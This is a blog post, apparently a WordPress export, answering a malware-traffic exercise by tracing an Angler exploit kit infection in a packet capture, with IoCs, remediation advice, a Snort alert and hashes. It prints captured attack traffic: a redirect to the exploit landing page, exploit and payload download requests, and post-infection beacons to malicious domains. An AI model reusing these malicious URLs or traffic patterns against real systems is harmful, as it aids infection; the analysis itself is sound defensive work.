{"id":375,"date":"2016-02-23T20:25:16","date_gmt":"2016-02-23T20:25:16","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=375"},"modified":"2016-02-23T22:09:39","modified_gmt":"2016-02-23T22:09:39","slug":"2016-02-06-network-alerts-at-cupids-arrow-online","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=375","title":{"rendered":"2016-02-06 Network Alerts At Cupid&#8217;s Arrow Online"},"content":{"rendered":"<p>So here is the latest malware exercise from Brad. I will not lie &#8211; for some reason this one threw me for a loop. Personally I think it was because I did not have my usual Saturday morning cuppa when I started working on this one. But the emails that Brad included really threw me off for some reason &#8211; even after running all the javascript attachments in my VM and seeing that there was no match with the infection traffic in the PCAP or in the Snort rules. With that being said, here are my results for this one. For some of the artifacts that I was able to extract from this exercise, please see <a href=\"http:\/\/github.com\/bloomer1016\/Malware-exercise-2016-02-06\" target=\"_blank\">my Github repo here<\/a>.<\/p>\n<p>\u2013 Date and time range of the traffic you\u2019re reviewing.<br \/>\n&gt; 2016-02-05 21:24:05 &#8211; 2016-02-05 21:36:45<\/p>\n<p>\u2013 IP address, MAC address, and host name.<br \/>\n&gt; 10.41.245.114 \/ 00:17:31:7d:52:ba \/ DEKKER-PC<\/p>\n<p>\u2013 Description of the activity (what happened, if the host became infected, any details, etc.).<br \/>\n&gt; Based on what I can tell from the saved PCAP, the infection for Justini Dekker (Finance Director) did not come from a malicious email that got by the email filters, but potentially from a personal email account that they have with Yahoo and a malicious email they received there. <\/p>\n<p>\u2013 A conclusion with recommendations for any follow-up actions.<br \/>\n&gt; At this time Justini&#8217;s system should be re-imaged do to it being infected with malware. The IoC&#8217;s found below should be added as well to any existing Snort rules and be blocked via any proxy servers within the organization or at the firewall. User awareness training should also include phishing emails, and who to report any suspicious activity too. Lastly, and if possible, I would recommend searching through any previous logs looking for the IoCs to see if anyone else may have gone to the same site(s).<\/p>\n<p>\u2013 Indicators of Compromise (IP, FQDN, etc\u2026)<br \/>\n&gt; www.source-werbeartikel.com \/ 213.174.33.141<br \/>\n&gt; lsbery.tk \/ 85.93.0.32<br \/>\n&gt; trs.webprospector.de \/ 141.0.19.127<br \/>\n&gt; bsbkxs.zdxwx3m.pw \/ 86.106.93.167<br \/>\n&gt; tplandthepropforcontent.com \/ 185.86.77.12<\/p>\n<p>Notes about the investigation:<br \/>\n==============================<\/p>\n<p>After running the Javascript files within my VM and comparing the domains\/IP addresses to what was found in the Snort rules, I came to the conclusion that the malicious emails (malspam) that managed to get by the email filtering appliance was a dead end. So looking at the PCAP once again from a different perspective, I did see that the user logged in to their Yahoo account as you can see below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/02\/IMG1-2.png\" rel=\"attachment wp-att-376\"><img loading=\"lazy\" decoding=\"async\" style=\"border:1px solid black\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/02\/IMG1-2.png\" alt=\"Request for Yahoo mail \" width=\"1277\" height=\"238\" class=\"aligncenter size-full wp-image-376\" \/><\/a><\/p>\n<p>From there, I believe that the user received a malicious email and possibly clicked a link for the site &#8220;www[.]source-werbeartikel[.]com&#8221; which is the start of the infection chain. Based on the PCAP there is no Bing\/Google search for this site, and there is no referral site (so directly sent to the site):<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/ HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: www.source-werbeartikel.com\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tDate: Fri, 05 Feb 2016 21:28:24 GMT\r\n\tServer: Apache\r\n\tExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\n\tCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\n\tPragma: no-cache\r\n\tContent-Encoding: none\r\n\tSet-Cookie: frontend=v44s4dbt2ejv77gpagjlclaha6; expires=Fri, 05-Feb-2016 22:28:24 GMT; path=\/; domain=www.source-werbeartikel.com; HttpOnly\r\n\tSet-Cookie: banner_fv=1454707704; expires=Mon, 12-Mar-2063 18:56:48 GMT; path=\/; domain=www.source-werbeartikel.com; httponly\r\n\tKeep-Alive: timeout=10, max=100\r\n\tConnection: Keep-Alive\r\n\tTransfer-Encoding: chunked\r\n\tContent-Type: text\/html; charset=UTF-8<\/pre>\n<p>When this site is rendered, there is a call for a Flash file on another site from the www[.]source-werbeartikel[.]com site as you can see below:<\/p>\n<p>\t<a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/02\/IMG2-2.png\" rel=\"attachment wp-att-377\"><img loading=\"lazy\" decoding=\"async\" style=\"border:1px solid black\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/02\/IMG2-2.png\" alt=\"Call to initial compromise site\" width=\"1253\" height=\"254\" class=\"aligncenter size-full wp-image-377\" \/><\/a><\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/shop.php?sid=4046AAB187AB2C1563B214BE7AC6702950B304E2E9E1696E18244B8501B268FD92DA0D313D2273E24C283B HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/www.source-werbeartikel.com\/\r\n\tx-flash-version: 15,0,0,189\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: lsbery.tk\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tDate: Fri, 05 Feb 2016 21:27:39 GMT\r\n\tServer: Apache\/2.2.15 (CentOS)\r\n\tX-Powered-By: PHP\/5.3.3\r\n\tContent-Length: 1983\r\n\tConnection: close\r\n\tContent-Type: application\/x-shockwave-flash\r\n\r\n\tCWS..<\/pre>\n<p>\tExtracting this Flash file from the PCAP and looking it up in VirusTotal and Hybrid Analysis, I can see that there are some hits for it:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tMD5 hash: 5e251668b8a3e02e9da376d6f7da8229\r\n\tVirusTotal link: http:\/\/www.virustotal.com\/en\/file\/930d5d620ba930f840ac205f75222de83f2c1336a04cc98cb293da3eebe6bf3e\/analysis\/\r\n\tDetection ratio: 6 \/ 54\r\n\tFirst submitted: 2016-02-05 08:27:55 UTC\r\n\r\n\tHybrid Analysis link: http:\/\/www.hybrid-analysis.com\/sample\/930d5d620ba930f840ac205f75222de83f2c1336a04cc98cb293da3eebe6bf3e?environmentId=4<\/pre>\n<p>The odd thing about this is that there is GET request for the same domain, but a different URI (&#8216;shop.php?sid&#8217; versus &#8216;hot.php?id&#8217;). Also, the referring site seems to be www[.]source-werbeartikel[.]com, but I can not find any link to the &#8216;hot.php?id&#8217; URL from that site (http:\/\/www.source-werbeartikel.com):<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/hot.php?id=4046AAB187AB2C1563B214BE7AC6702950B304E2E9E1696E18244B8501B268FD92DA0D313D2273E24C283B HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tReferer: http:\/\/www.source-werbeartikel.com\/\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: lsbery.tk\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tDate: Fri, 05 Feb 2016 21:27:40 GMT\r\n\tServer: Apache\/2.2.15 (CentOS)\r\n\tX-Powered-By: PHP\/5.3.3\r\n\tContent-Length: 464\r\n\tConnection: close\r\n\tContent-Type: text\/html; charset=UTF-8\r\n\r\n\t&lt;html&gt;\r\n\t&lt;head&gt;\r\n\t&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text\/html; charset=utf-8&quot;&gt;\r\n\t&lt;meta name=&quot;robots&quot; content=&quot;noindex, nofollow&quot;&gt;\r\n\t&lt;meta http-equiv=&quot;refresh&quot; content=&quot;0; url='http:\/\/bsbkxs.zdxwx3m.pw\/civis\/index.php?PHPSESSID=3.b7&amp;action=714324p02212u2q4548f8'&quot;&gt;\r\n\t&lt;\/head&gt;\r\n\t&lt;body&gt;\r\n\t&lt;script type=&quot;text\/javascript&quot;&gt;\r\n\twindow.self.location.replace(&quot;http:\/\/bsbkxs.zdxwx3m.pw\/civis\/index.php?PHPSESSID=3.b7&amp;action=714324p02212u2q4548f8&quot;);\r\n\t&lt;\/script&gt;\r\n\t&lt;\/body&gt;\r\n\t&lt;\/html&gt;<\/pre>\n<p>The only thing that I can think of is that it is called from the Flash file that gets played from the &#8216;\/shop.php?sid&#8217; URL. From here we see the GET request for the domain &#8216;bsbkxs[.]zdxwx3m[.]pw&#8217; which is the domain that is associated with the Angler EK as you can see by the tell-tale sign of the page (quotes from something like &#8220;Pride and Prejudice&#8221;), and from the Snort alert as well:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/civis\/index.php?PHPSESSID=3.b7&amp;action=714324p02212u2q4548f8 HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tReferer: http:\/\/lsbery.tk\/hot.php?id=4046AAB187AB2C1563B214BE7AC6702950B304E2E9E1696E18244B8501B268FD92DA0D313D2273E24C283B\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: bsbkxs.zdxwx3m.pw\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.2.1\r\n\tDate: Fri, 05 Feb 2016 21:28:28 GMT\r\n\tContent-Type: text\/html\r\n\tContent-Length: 97609\r\n\tConnection: keep-alive\r\n\tSet-Cookie: 257dd=458acc7df76dfb53fa38c8f3ed10cd06; expires=Fri, 05-Feb-2016 22:28:32 GMT; path=\/\r\n\r\n\t&lt;!DOCTYPE html&gt;\r\n\t&lt;html&gt;\r\n\r\n\t&lt;head&gt;\r\n\t    \r\n\t    &lt;title&gt;\r\n\t        table, and, with the rest the\r\n\t    &lt;\/title&gt;\r\n\t&lt;\/head&gt;\r\n\r\n\t&lt;body&gt;\r\n\t&lt;input&gt;\r\n\t &lt;q&gt;\r\n\t   misters wished it were explained to him was like every other of\r\n\t &lt;\/q&gt;\r\n\t  was allowed no liberty, no society, no amusement, till my father's last request to me now. Well, I went, left all that can no\r\n\t &lt;nobr&gt;\r\n\t  it wisest to touch , and I hope it won't hurt your eyes-- will you take your usual walk to the condition of the friends they had not felt the necessity of temporizing his<\/pre>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\t&#x5B;**] &#x5B;1:36636:3] EXPLOIT-KIT Angler exploit kit index uri request attempt &#x5B;**]\r\n\t&#x5B;Classification: Attempted User Privilege Gain] &#x5B;Priority: 1] \r\n\t02\/05-21:28:26.013021 10.41.245.114:49279 -&gt; 86.106.93.167:80\r\n\tTCP TTL:128 TOS:0x0 ID:4167 IpLen:20 DgmLen:469 DF\r\n\t***AP*** Seq: 0xA64DEBC4  Ack: 0x4DD5AA9E  Win: 0x100  TcpLen: 20<\/pre>\n<p>From here we can see that there is a POST being made which is most likely passing back system information and getting things staged ready for the exploit:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tPOST \/civis\/so.cpg?directly=-pf&amp;commission=&amp;important=n0IP&amp;color=xMZn&amp;and=&amp;analysis=doL0EY&amp;hundred=nJBKRWWP4&amp;name=Xe5tZx&amp;any=bMXK&amp;certain=aWh-AJtz7&amp;rather=PEd HTTP\/1.1\r\n\tAccept: *\/*\r\n\tContent-Type: text\/html; charset=utf-8\r\n\tReferer: http:\/\/bsbkxs.zdxwx3m.pw\/civis\/index.php?PHPSESSID=3.b7&amp;action=714324p02212u2q4548f8\r\n\tAccept-Language: en-US\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: bsbkxs.zdxwx3m.pw\r\n\tContent-Length: 188\r\n\tConnection: Keep-Alive\r\n\tCache-Control: no-cache\r\n\r\n\t\/le6G4EAggeILlw476wENlfYMjH78aSGiWVvkQ41OtTdMHym+ZNINnTqP112RfFL5IVEBD1jn4X34\/Yi6QerQsKZFRtlPfQMtIq3eJgdSL4K8\/wumnoQ65eu3lNhjzzsxEEPp\/9ATrCFLiD7VFi5E7LB+8HbKdGCfsPHM21r9khjaRRxa0UFMTc4NDA=HTTP\/1.1 200 OK\r\n\tServer: nginx\/1.2.1\r\n\tDate: Fri, 05 Feb 2016 21:28:31 GMT\r\n\tContent-Type: text\/html\r\n\tContent-Length: 2432\r\n\tConnection: keep-alive\r\n\tSet-Cookie: 257dd=215ea12c00985a334669cba8925bc7ff; expires=Fri, 05-Feb-2016 22:28:36 GMT; path=\/<\/pre>\n<p>And then the Flash exploit being downloaded:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/charge.zhtml?dead=sVShjH&amp;society=KgXs1bcH&amp;level=O29Gm9T3&amp;go=VdL&amp;once=XN3S3cuYQ&amp;way=Z41t&amp;nothing=sTJVXv7X&amp;art=Jw HTTP\/1.1\r\n\tAccept: *\/*\r\n\tReferer: http:\/\/bsbkxs.zdxwx3m.pw\/civis\/index.php?PHPSESSID=3.b7&amp;action=714324p02212u2q4548f8\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: bsbkxs.zdxwx3m.pw\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 404 Not Found\r\n\tServer: nginx\/1.2.1\r\n\tDate: Fri, 05 Feb 2016 21:28:31 GMT\r\n\tContent-Type: text\/html\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\r\n\t0\r\n\r\n\tGET \/charge.zhtml?dead=sVShjH&amp;society=KgXs1bcH&amp;level=O29Gm9T3&amp;go=VdL&amp;once=XN3S3cuYQ&amp;way=Z41t&amp;nothing=sTJVXv7X&amp;art=Jw HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/bsbkxs.zdxwx3m.pw\/civis\/index.php?PHPSESSID=3.b7&amp;action=714324p02212u2q4548f8\r\n\tx-flash-version: 15,0,0,189\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: bsbkxs.zdxwx3m.pw\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.2.1\r\n\tDate: Fri, 05 Feb 2016 21:28:31 GMT\r\n\tContent-Type: application\/x-shockwave-flash\r\n\tContent-Length: 38557\r\n\tConnection: keep-alive\r\n\tSet-Cookie: 257dd=215ea12c00985a334669cba8925bc7ff; expires=Fri, 05-Feb-2016 22:28:36 GMT; path=\/\r\n\r\n\tCWS<\/pre>\n<p>Which then leads to the malicious binary as you can see below:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/today.jst?technical=_MNsOrB&amp;captain=&amp;something=gxPx-&amp;own=&amp;themselves=T_wh7g5&amp;eye=l3_LBg&amp;citizen=zdelxIDGFLQvZFA8KbsEuiX HTTP\/1.1\r\n\tConnection: Keep-Alive\r\n\tAccept: *\/*\r\n\tAccept-Encoding: gzip, deflate\r\n\tAccept-Language: en-US\r\n\tReferer: http:\/\/lsbery.tk\/hot.php?id=4046AAB187AB2C1563B214BE7AC6702950B304E2E9E1696E18244B8501B268FD92DA0D313D2273E24C283B\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko\r\n\tHost: bsbkxs.zdxwx3m.pw\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.2.1\r\n\tDate: Fri, 05 Feb 2016 21:28:35 GMT\r\n\tContent-Type: application\/octet-stream\r\n\tContent-Length: 360468\r\n\tConnection: keep-alive\r\n\tSet-Cookie: 257dd=98afc314266b840fe13d51613f682a80; expires=Fri, 05-Feb-2016 22:28:39 GMT; path=\/<\/pre>\n<p>The Angler EK Flash file and the malicious binary were found on VirusTotal as you can see below, but since the malicious binary is encrypted, VirusTotal comes back with no results:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\t2016-02-06 AnglerEK Flash.swf\r\n\tMD5 hash: cf90ba155fda322eeadd2fdeb4368849\r\n\tVirusTotal link: http:\/\/www.virustotal.com\/en\/file\/5776e2303a6f38d8d6f0af5640047f959f21f93d35741b36050c6ea76a35e26a\/analysis\/\r\n\tDetection ratio: 9 \/ 54\r\n\tFirst submitted: 2016-02-06 07:02:06 UTC\r\n\r\n\t2016-02-06 AnglerEK.exe\r\n\tMD5 hash: 4466cd2032944d03ffe9d4d7d74083c2\r\n\tVirusTotal link: http:\/\/www.virustotal.com\/en\/file\/8b495d303059cbe429d0c621c12e1660e7830c57faa45f13f8026abfc5fe94d4\/analysis\/\r\n\tDetection ratio: 0 \/ 54\r\n\tFirst submitted: 2016-02-06 08:44:21 UTC<\/pre>\n<p>From here we can see more requests being made to another domain (tplandthepropforcontent[.]com) that vary from pulling down more binaries (which I believe are encrypted) or performing POSTs:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\t10552 417.579472 tplandthepropforcontent.com GET \/images\/lYPocsAb06v\/c8XQqRymQmAJFP\/h_2B5m1KKRf5r1Y4_2B3G\/oZmZCYB7EfcekWtW\/Z1Y39RsTdnI08N6\/cKQZGqmzVSGNWyTKcD\/mU2QZV17k\/dpJggBEqg1bEhLhkbq1f\/hid9gA6Nlhk22NhvpaS\/kdbnxdC3W3\/i.jpeg HTTP\/1.1 \r\n\t11851 514.020928 10.41.245.114 49317 192.210.137.123 80 415 160 HTTP  tplandthepropforcontent.com GET \/images\/_2BL34iAt\/duBrtY8yPQZFSowi6hrx\/NCCfY_2FvYXtpFfxS_2\/FtFeSN9J0xiGr_2BLi5bNN\/o_2FP5AxHOhJ7\/lt9ZWDQJ\/weOaPbEvJU1WbreNgqGqgTM\/Fqoik56OHu\/q9ThaQIFfhfbkFPi0\/joCXwntZM\/t_2FUBECf35\/i.gif HTTP\/1.1 \r\n\t12009 537.767127 10.41.245.114 49317 192.210.137.123 80 412 160 HTTP  tplandthepropforcontent.com GET \/images\/tflgmImOzp\/42Rg9ihzjIymH5iH5\/L9wANA8VxM15\/jnnfBxhHOwZ\/cHF2ILkrpYMJPp\/9pH8hoet_2FWH_2B5Tzv_\/2Fo05gI_2BmgShPL\/B4kdHaBSTFdJ1dj\/cUFO4RaVEJQxSjFbCk\/VoWjaIFnd\/A4Q6MFER2X\/lron1.jpeg HTTP\/1.1 \r\n\t12021 550.796423 10.41.245.114 49317 192.210.137.123 80 1263 160 HTTP  tplandthepropforcontent.com POST \/images\/u0oFNKi5H86jc9OSaYE4\/BroknRFgJyiQqkL1pyU\/x2VmR87ntC_2FCds_2BwYo\/e9VPw6_2Fi_2F\/BLBYlThn\/ta05mpAB9KfiLIR_2BXhC_2\/FYRRQVYfRp\/2gRz_2FChmPw9kgq_\/2FYnMOTGLopK\/mDgMprxzMJs\/7ZoNqqxJ_2BFbt\/uS3d12Wv9\/dVLEIt2h6\/qS.bmp HTTP\/1.1  (application\/octet-stream)\r\n\t12512 654.554234 10.41.245.114 49330 192.210.137.123 80 407 173 HTTP  tplandthepropforcontent.com GET \/images\/SIMu3u0tCE_\/2FBa57gf2G9T3p\/7Gd749x3i30Bc29AmMd1I\/9BynSv4L9clMjLUC\/2NOmuxvCCb3UFRp\/J9oNOjGJHTFzVEQLsg\/Y85Hng81l\/xUFdGvuDFKG8Ae7tWzaq\/dwzUUSx5MYFB3dizen1\/VKmLFS_2\/B9F.jpeg HTTP\/1.1 \r\n\t15672 670.381082 10.41.245.114 49380 192.210.137.123 80 656 223 HTTP  tplandthepropforcontent.com POST \/images\/tLL_2FR9qqixlfXoDE\/BopjUwksV\/ET_2BiLEqrqm6QHbg3DJ\/honz5Mog2bf067In_2F\/OHXXSTnwcJ8FtON5TZJgm_\/2B0cc0Q5PFn3D\/Xl5Vx9Nn\/xd7luap4dz61_2FlBfivbgO\/FnDLLZsjIy\/KZpuw7QNQIBlf\/Pspw_2F.bmp HTTP\/1.1  (application\/octet-stream)<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>So here is the latest malware exercise from Brad. I will not lie &#8211; for some reason this one threw me for a loop. Personally I think it was because I did not have my usual Saturday morning cuppa when I started working on this one. But the emails that Brad included really threw me off for some reason &#8211; even after running all the javascript attachments in my VM and seeing that there was no match with the infection traffic in the PCAP or in the Snort rules. With that being said, here are my results for this one&#8230;.<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=375\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-375","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/375","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=375"}],"version-history":[{"count":9,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/375\/revisions"}],"predecessor-version":[{"id":403,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/375\/revisions\/403"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=375"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=375"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=375"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}